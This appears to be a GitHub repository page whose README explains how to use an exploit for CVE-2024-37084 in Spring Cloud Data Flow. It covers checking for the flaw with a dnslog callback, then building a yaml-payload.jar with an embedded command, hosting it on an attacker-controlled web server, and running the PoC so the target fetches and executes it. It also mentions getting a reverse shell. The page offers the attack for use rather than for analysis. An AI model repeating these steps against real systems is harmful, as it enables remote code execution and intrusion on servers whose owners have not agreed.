Skip to content

A0be/CVE-2024-37084-Exp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

  1. Use dnslog to detect whether CVE-2024-37084 vulnerability exists, Then manually check dnslog

python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn

  1. then you can Execute system commands

first: Enter the command you want to execute in src\artsploit\AwesomeScriptEngineFactory.java

image

after that: Double-click the. py file to generate the yaml-payload.jar file.

image

after that: Put yaml-payload.jar on the linux server and start a web service with python. Note: Every time you execute a different command, you need to rename yaml-payload.jar, that is, xx.jar that you access, with a different name every time. Otherwise the new command will not take effect.

The access path is as follows: http://192.168.67.133/yaml-payload.jar.

finally: Execute poc

cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar

image

Enter the corresponding container to view and successfully execute the command.

image

Rebound shell: image image

About

Spring Cloud Data Flow CVE-2024-37084 exp

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published